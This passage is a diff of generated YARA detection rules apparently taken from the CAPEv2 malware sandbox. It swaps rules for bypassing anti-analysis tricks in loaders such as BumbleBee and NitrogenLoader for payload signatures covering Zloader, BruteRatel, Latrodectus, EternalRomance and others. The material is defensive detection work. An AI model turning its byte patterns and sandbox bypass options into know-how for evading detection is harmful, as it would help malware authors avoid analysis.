-		logic_hash = "be0f9b52fb630730a38160f4ad2d50b6b4bea5edd82e3ea4d1e257cf7b090910"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/EternalRomance.yar#L1-L33"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5390fae3e2411a715cdc965df8648c0c4c511d53d5f76031714f1b784b58eb0d"
 		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "nop-rdtscp=1"
+		quality = 68
+		tags = "FILE"
+		cape_type = "EternalRomance Exploit"
 
 	strings:
-		$antivm = {46 0F 01 F9 [0-4] 66 0F 6E C6 F3 0F E6 C0 66 0F 2F ?? 73}
+		$SMB1 = "Frag"
+		$SMB2 = "Free"
+		$session7_32_1 = {2A 02 1C 00}
+		$session7_64_1 = {2A 02 28 00}
+		$session8_32_1 = {2A 02 24 00}
+		$session8_64_1 = {2A 02 38 00}
+		$session7_32_2 = {D5 FD E3 FF}
+		$session7_64_2 = {D5 FD D7 FF}
+		$session8_32_2 = {D5 FD DB FF}
+		$session8_64_2 = {D5 FD C7 FF}
+		$ipc = "IPC$"
+		$pipe1 = "atsvc"
+		$pipe2 = "browser"
+		$pipe3 = "eventlog"
+		$pipe4 = "lsarpc"
+		$pipe5 = "netlogon"
+		$pipe6 = "ntsvcs"
+		$pipe7 = "spoolss"
+		$pipe8 = "samr"
+		$pipe9 = "srvsvc"
+		$pipe10 = "scerpc"
+		$pipe11 = "svcctl"
+		$pipe12 = "wkssvc"
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $SMB* ) ) and $ipc and ( any of ( $session* ) ) and ( any of ( $pipe* ) )
 }
-rule CAPE_Dridexloader : FILE
+rule CAPE_Tclient : FILE
 {
 	meta:
-		description = "DridexLoader API Spam Bypass"
+		description = "TClient Payload"
 		author = "kevoreilly"
-		id = "a8b62f64-87a0-58d3-8876-9b0f6a7deb97"
-		date = "2021-03-09"
-		modified = "2021-03-09"
+		id = "38c9ea20-9d91-5fb0-8b3b-170538ad7ea8"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/DridexLoader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "00a3e4e80a2558ee52035f091e2339fa2dad6f6515b9dc099f2f3800e4c70bce"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/TClient.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6edcd01e4722b367723ed77d9596877d16ee35dc4c160885d125f83e45cee24d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$trap-13,action0=ret,count=0"
+		cape_type = "TClient Payload"
 
 	strings:
-		$trap = {6A 50 6A 14 6A 03 5A 8D 4C 24 ?? E8 [4] 68 [4] 68 [4] E8 [4] 85 C0 74 05}
+		$code1 = {41 0F B6 00 4D 8D 40 01 34 01 8B D7 83 E2 07 0F BE C8 FF C7 41 0F BE 04 91 0F AF C1 41 88 40 FF 81 FF 80 03 00 00 7C D8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $trap
+		uint16( 0 ) == 0x5A4D and any of ( $code* )
 }
-rule CAPE_Bumblebee : FILE
+rule CAPE_Zloader : FILE
 {
 	meta:
-		description = "BumbleBee Anti-VM Bypass"
-		author = "enzo & kevoreilly"
-		id = "85e2c9fd-86de-57c8-99ec-de2cc3996876"
-		date = "2023-02-08"
-		modified = "2023-02-08"
+		description = "Zloader Payload"
+		author = "kevoreilly, enzok"
+		id = "a4250532-ddfc-58c2-bbae-82cc201d0c5d"
+		date = "2025-04-07"
+		modified = "2025-04-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/BumbleBee.yar#L34-L46"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0a632a0b30b28d544880eb1cfdd85e95f455c343d60f8d6922d4196ef7415961"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Zloader.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa"
+		logic_hash = "525670973b67aac048199529c97d6be00b0a8cca9bc90deb647366d92a5ea540"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$antivm1+2,bp1=$antivm2+2,bp1=$antivm3+38,action0=jmp,action1=skip,count=0,force-sleepskip=1"
+		cape_type = "Zloader Payload"
 
 	strings:
-		$antivm1 = {84 C0 74 09 33 C9 FF [4] 00 CC 33 C9 E8 [3] 00 4? 8B C8 E8}
-		$antivm2 = {84 C0 0F 85 [2] 00 00 33 C9 E8 [4] 48 8B C8 E8 [4] 48 8D 85}
-		$antivm3 = {33 C9 E8 [4] 48 8B C8 E8 [4] 83 CA FF 48 8B 0D [4] FF 15 [4] E8 [4] 84 c0}
+		$rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)}
+		$decrypt_conf = {83 C4 04 84 C0 74 5? E8 [4] E8 [4] E8 [4] E8 [4] ?8 [4] ?8 [4] ?8}
+		$decrypt_conf_1 = {48 8d [5-11] e8 [4] 48 [3-4] 48 [3-4] 48 [6] E8}
+		$decrypt_conf_2 = {48 8d [5] 4? [5] e8 [4] 48 [3-4] 48 8d [5] E8 [4] 48}
+		$decrypt_key_1 = {66 89 C2 4? 8D 0D [3] 00 4? B? FC 03 00 00 E8 [4] 4? 83 C4 [1-2] C3}
+		$decrypt_key_2 = {48 8d 0d [3] 00 66 89 ?? 4? 89 F0 4? [2-5] E8 [4-5] 4? 83 C4}
+		$decrypt_key_3 = {48 8d 0d [3] 00 e8 [4] 66 89 [3] b? [4] e8 [4] 66 8b}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $decrypt_conf* ) and ( 1 of ( $decrypt_key* ) or $rc4_init )
 }
-rule CAPE_Privateloader
+rule CAPE_Zerot : FILE
 {
 	meta:
-		description = "PrivateLoader indirect syscall capture"
+		description = "ZeroT Payload"
 		author = "kevoreilly"
-		id = "3a0b16da-ec84-5761-bcf2-106362c5667d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dc5dc18c-2ec6-541d-905c-42543f17b16d"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/PrivateLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "204a86bb3743f19fed0fe55ff5ccd716661f7f315b5966a29e434ccb3e160526"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/ZeroT.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "f60ae25ac3cd741b8bdc5100b5d3c474b5d9fbe8be88bfd184994bae106c3803"
 		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,sysbp=$syscall*-2"
-		packed = "075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4"
+		quality = 68
+		tags = "FILE"
+		cape_type = "ZeroT Payload"
 
 	strings:
-		$syscall = {48 31 C0 4C 8B 19 8B 41 10 48 8B 49 08 49 89 CA 41 FF E3}
+		$decrypt = {8B C1 8D B5 FC FE FF FF 33 D2 03 F1 F7 75 10 88 0C 33 41 8A 04 3A 88 06 81 F9 00 01 00 00 7C E0}
+		$string1 = "(*^GF(9042&*"
+		$string2 = "s2-18rg1-41g3j_.;"
+		$string3 = "GET" wide
+		$string4 = "open"
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Blister : FILE
+rule CAPE_Nanolocker : FILE
 {
 	meta:
-		description = "Blister Sleep Bypass"
+		description = "NanoLocker Payload"
 		author = "kevoreilly"
-		id = "34657bab-f100-5ea8-9111-da2806f46b79"
-		date = "2024-05-09"
-		modified = "2024-05-09"
+		id = "6fff6a27-a153-5461-9a75-2253c2f7d408"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Blister.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "aba379b93c85241cf250829832b2c8a5eaafb3abd0ff955dbaf0d06489c00deb"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/NanoLocker.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "fe6c8a4e259c3c526f8f50771251f6762b2b92a4df2e8bfc705f282489f757db"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$sleep1+6,bp1=$sleep2+7,action0=setsignflag,action1=clearcarryflag,count=3"
-		packed = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00"
-		packed = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
+		cape_type = "NanoLocker Payload"
 
 	strings:
-		$sleep1 = {FF FF 83 7D F0 00 (E9|0F 8?)}
-		$sleep2 = {81 7D D8 90 B2 08 00 (E9|0F 8?)}
-		$protect = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
-		$lock = {56 33 F6 B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75 F7}
-		$comp = {6A 04 59 A1 [4] 8B 78 04 8B 75 08 33 C0 F3 A7 75 0B 8B 45 0C 83 20 00 33 C0 40 EB 02 33 C0}
+		$a1 = "NanoLocker"
+		$a2 = "$humanDeadline"
+		$a3 = "Decryptor.lnk"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $protect , $lock , $comp ) and all of ( $sleep* )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Loadersyscall
+rule CAPE_Bruteratel
 {
 	meta:
-		description = "Loader Syscall"
-		author = "enzok"
-		id = "45193b38-938e-55cf-9ea0-7bd48f0d77e4"
-		date = "2024-12-02"
-		modified = "2024-12-02"
+		description = "BruteRatel Payload"
+		author = "kevoreilly"
+		id = "61b951e4-0c27-59c0-8ea2-715b673fdcee"
+		date = "2024-07-11"
+		modified = "2024-07-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/NitrogenLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "3c7ffd8b95032cffecff7fa7e5f5f561cce13e1109f6a9b30bc743642b495e45"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BruteRatel.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "0984977c716d6f8e068c045166eb5db77c9fbce27513e555dceca348375f1a66"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "sysbp=$syscall*-2,count=0"
+		cape_type = "BruteRatel Payload"
 
 	strings:
-		$makehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
-		$number = {49 89 C3 B? [4] E8 [3] 00}
-		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
+		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
+		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
+		$jmpapi = {49 89 ?? 10 49 C7 45 08 ?? 00 00 00 E8 00 00 00 00 ?? (48|49) 83 [2] 41 FF E2}
+		$decode = {89 C2 8A 14 17 40 38 EA 75 06 FF C0 89 03 EB 0B 41 88 14 08 48 FF C1 FF 03 EB}
 
 	condition:
-		all of them
+		2 of them
 }
-rule CAPE_Nitrogenloaderaes
+rule CAPE_Latrodectus
 {
 	meta:
-		description = "NitrogenLoader AES and IV"
+		description = "Latrodectus Payload"
 		author = "enzok"
-		id = "c79a00af-52f9-5f07-9c58-e8964e70986f"
-		date = "2024-12-02"
-		modified = "2024-12-02"
+		id = "956b6736-b3ef-5974-b3dd-02d04336dbe8"
+		date = "2025-05-10"
+		modified = "2025-05-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/NitrogenLoader.yar#L15-L27"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "de8ed0e98948cfadfd579e334fd9ce9f777ddbd988de897529ba71cb5eb2d396"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Latrodectus.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "a547cff9991a713535e5c128a0711ca68acf9298cc2220c4ea0685d580f36811"
+		logic_hash = "a8430299930f4c8de0a88c6836d4821871f7183cc5ff44ea9be84fbea47bbb13"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$keyiv0+8,action0=dump:ecx::64,hc0=1,bp1=$keyiv0*-4,action1=dump:ecx::32,hc1=1,count=0"
+		cape_type = "Latrodectus Payload"
 
 	strings:
-		$keyiv0 = {48 8B 8C 24 [4] E8 [3] 00 4? 89 84 24 [4] 4? 8B 84 24 [4] 4? 89 84 24 [4] 4? 8B 8C 24 [4] E8 [3] 00}
-		$keyiv1 = {48 89 84 24 [4] 4? 8B 84 24 [4] 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF}
-		$keyiv2 = {48 63 84 24 [4] 4? 8B C0 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF 4? 8B 84 24}
+		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
+		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
+		$procchk1 = {E8 [3] FF 85 C0 74 [2] FF FF FF FF E9 [4] E8 [4] 89 44 24 ?? E8 [4] 83 F8 4B 73 ?? 83 [3] 06}
+		$procchk2 = {72 [2] FF FF FF FF E9 [4] E8 [4] 83 F8 32 73 ?? 83 [3] 06}
+		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
 
 	condition:
 		all of them
 }
-rule CAPE_Nitrogenloaderbypass
+rule CAPE_Latrodectus_AES
 {
 	meta:
-		description = "Nitrogen Loader Exit Bypass"
+		description = "Latrodectus Payload"
 		author = "enzok"
-		id = "397b0b79-d569-5a71-bcac-ce0d64f706e6"
-		date = "2024-12-02"
-		modified = "2024-12-02"
+		id = "16c295f5-cea0-57b5-b826-e1126e50c8cc"
+		date = "2025-05-10"
+		modified = "2025-05-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/NitrogenLoader.yar#L29-L41"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "3a034d3ddd18723ea1f91814c8c2a2c47a749dfd1496a5d4777d8ff8bfab3457"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Latrodectus.yar#L18-L34"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "5cecb26a3f33c24b92a0c8f6f5175da0664b21d7c4216a41694e4a4cad233ca8"
+		logic_hash = "058d278c16527969066d1b4ea7f0e3ab2809d5480cdab06ec476b465e0c4795a"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp2=$exit-2,action2=jmp,count=0"
+		cape_type = "Latrodectus Payload"
 
 	strings:
-		$string1 = "LoadResource"
-		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
-		$exit = {33 C9 E8 [4] E8 [4] 48 8D 84 24 [4] 48 89 44 24 ?? 4? B? E4 00 00 00 4? 8B 05 [4] B? 03 00 00 00 48 8D}
+		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
+		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
+		$key = {C6 44 2? ?? ?? [150] C6 44 2? ?? ?? B8 02}
+		$aes_ctr_1 = {8B 44 24 ?? FF C8 89 44 24 ?? 83 7C 24 ?? 00 7C ?? 4? 63 44 24 ?? 4? 8B 4C 24 ?? 0F B6 84 01 F0 00 00 00 3D FF 00 00 00}
+		$aes_ctr_2 = {48 03 C8 48 8B C1 0F B6 ?? 48 63 4C 24 ?? 0F B6 4C 0C ?? 33 C1 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 03 D1 48 8B CA 88 01}
+		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
 
 	condition:
 		all of them
 }
-rule CAPE_Nitrogenloaderconfig
+rule CAPE_Rcsession
 {
 	meta:
-		description = "NitrogenLoader Config Extraction"
-		author = "enzok"
-		id = "a23d7012-b7b2-5313-9974-d65c1364c630"
-		date = "2024-12-02"
-		modified = "2024-12-02"
+		description = "RCSession Payload"
+		author = "kevoreilly"
+		id = "841e6bd1-4f09-54dc-8dec-2e9423a34003"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/NitrogenLoader.yar#L43-L54"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "a1f9e95b8039b16e3926b7288c036e81cf72b2dbb91ab9e69125f18d89fa1a03"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/RCSession.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "ebd1e9e615a91c35b36332cad55519607323469df738cec4464288b45787630d"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$decrypt1*+6,hc0=1,count=0,action0=string:rcx,typestring=NitrogenLoader Config"
+		cape_type = "RCSession Payload"
 
 	strings:
-		$decrypt1 = {48 8B 8C 24 [4] 0F B6 04 01 89 ?? 24 [1-4] 48 63 4C 24 ?? 33 D2 48 8B C1 48 F7 B4 24 [4] 48 8B C2 48 8B 8C}
-		$decrypt2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+		$a1 = {56 33 F6 39 74 24 08 7E 4C 53 57 8B F8 2B FA 8B C6 25 03 00 00 80 79 05 48 83 C8 FC 40 83 E8 00 74 19 48 74 0F 48 74 05 6B C9 09 EB 15 8B C1 C1 E8 02 EB 03 8D 04 09 2B C8}
+		$a2 = {83 C4 10 85 C0 74 ?? BE ?? ?? ?? ?? 89 74 24 10 E8 ?? ?? ?? ?? 6A 03 68 48 0B 00 00 56 53 57 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 18 85 C0 74 18 E8 ?? ?? ?? ?? 6A 03 68 48}
 
 	condition:
-		all of them
+		( any of ( $a* ) )
 }
-rule CAPE_Buerloader : FILE
+rule CAPE_Amadey : FILE
 {
 	meta:
-		description = "BuerLoader RDTSC Trap Bypass"
+		description = "Amadey Payload"
 		author = "kevoreilly"
-		id = "38f01199-6bd2-5519-b570-8c0f46e74286"
-		date = "2021-03-13"
-		modified = "2021-03-13"
+		id = "b9d81aa8-5504-5b71-86c7-8c00d75479ad"
+		date = "2023-09-04"
+		modified = "2023-09-04"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/BuerLoader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6f9f9b4c01251c0643c61701084cca2bdfeea08ca95f982355565cf05483d940"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Amadey.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "988258716d5296c1323303e8fe4efd7f4642c87bfdbe970fe9a3bb3f410f70a4"
+		logic_hash = "38f710b422a3644c9f0f3e80ad9ff28ef02050368c651a6cc2ce8b152b67bf48"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$trap+43,action0=skip,count=0"
+		cape_type = "Amadey Payload"
 
 	strings:
-		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
+		$decode1 = {8B D1 B8 FF FF FF 7F D1 EA 2B C2 3B C8 76 07 BB FF FF FF 7F EB 08 8D 04 0A 3B D8 0F 42 D8}
+		$decode2 = {33 D2 8B 4D ?? 8B C7 F7 F6 8A 84 3B [4] 2A 44 0A 01 88 87 [4] 47 8B 45 ?? 8D 50 01}
+		$decode3 = {8A 04 02 88 04 0F 41 8B 7D ?? 8D 42 01 3B CB 7C}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Darkgate
+rule CAPE_Doppelpaymer : FILE
 {
 	meta:
-		description = "DarkGate config"
-		author = "enzok"
-		id = "ce81f452-4096-51d6-97cc-624f9fbefa86"
-		date = "2024-02-26"
-		modified = "2024-02-26"
+		description = "DoppelPaymer Payload"
+		author = "kevoreilly"
+		id = "c8178906-1722-5908-9ad4-7ee1eef39138"
+		date = "2022-06-27"
+		modified = "2022-06-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/DarkGate.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "c1d35921f4fc3bac681a3d5148f517dc0ec90ab8c51e267c8c6cd5b1ca3dc085"
-		logic_hash = "25c0e77a83676c6a18445f8df0b1f7a9148de5f64eeb532f9a4f4d4652dd8191"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/DoppelPaymer.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "73a2575671bafc31a70af3ce072d6f94ae172b12202baebba586a02524cb6f9d"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$config2+3,action0=dump:edx::1025,count=0,typestring=DarkGate Config"
+		tags = "FILE"
+		cape_type = "DoppelPaymer Payload"
 
 	strings:
-		$part1 = {8B 55 ?? 8A 4D ?? 80 E1 3F C1 E1 02 8A 5D ?? 80 E3 30 81 E3 FF [3] C1 EB 04 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40}
-		$part2 = {8B 55 ?? 8A 4D ?? 80 E1 0F C1 E1 04 8A 5D ?? 80 E3 3C 81 E3 FF [3] C1 EB 02 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40}
-		$part3 = {8B 55 ?? 8A 4D ?? 80 E1 03 C1 E1 06 8A 5D ?? 80 E3 3F 02 CB 88 4C 10 FF FF 45}
-		$alphabet = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+="
-		$config1 = {B9 01 04 00 00 E8 [4] 8D 45}
-		$config2 = {8B 55 ?? 8D 45 ?? E8 [4] 8D 45 ?? 5? B? 06 00 00 00 B? 01 00 00 00 8B 45 ?? E8 [4] 8B 45 ?? B? [4] E8 [4] 75}
+		$getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3}
+		$cmd_string = "Setup run\\n" wide
 
 	condition:
-		($alphabet ) and ( any of ( $part* ) or all of ( $config* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Darkgateloader
+rule CAPE_Ursnifv3 : FILE
 {
 	meta:
-		description = "DarkGate Loader"
-		author = "enzok"
-		id = "feb90ae6-ec01-59da-a3df-217df2133588"
-		date = "2025-04-07"
-		modified = "2025-04-07"
+		description = "UrsnifV3 Payload"
+		author = "kevoreilly"
+		id = "9dd32f80-b535-52a3-91e1-4db005362fd4"
+		date = "2023-03-23"
+		modified = "2023-03-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/DarkGateLoader.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "00692123615d2f7eaf8aea07754fc9439cf58e1fb8eb4f44f0428b362f27e794"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/UrsnifV3.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "501cd52388aba16f9d33b4555f310e1ad58326916b15358a485c701acb87abd8"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$decrypt1+30,bp0=$decrypt2+29,action0=dump:eax::ebx,bp1=$decrypt3+80,action1=dumpsize:eax,bp2=$decrypt3+124,hc2=1,action2=dump:eax,count=0"
-		packed = "b15e4b4fcd9f0d23d902d91af9cc4e01417c426e55f6e0b4ad7256f72ac0231a"
+		tags = "FILE"
+		cape_type = "UrsnifV3 Payload"
+		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
+		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
 
 	strings:
-		$loader = "loader"
-		$decrypt1 = {B? 01 00 00 00 8B [3] E8 [4] 8B D7 32 54 [4] 88 54 18 FF 4? 4? 75}
-		$decrypt2 = {B? 01 00 00 00 8B [2] E8 [4] 8B D7 2B D3 [4] 88 54 18 FF 4? 4? 75}
-		$decrypt3 = {89 85 [4] 8B 85 [4] 8B F0 8D BD [4] B? 10 [3] F3 A5 8B 85 [4] 33 D2 [2] 8B 85 [4] 99}
+		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
+		$crypto32_2 = {8B 45 ?? 0F B6 3? FF 45 [2-4] 8B C? 23 C? 40 40 D1 E? 7?}
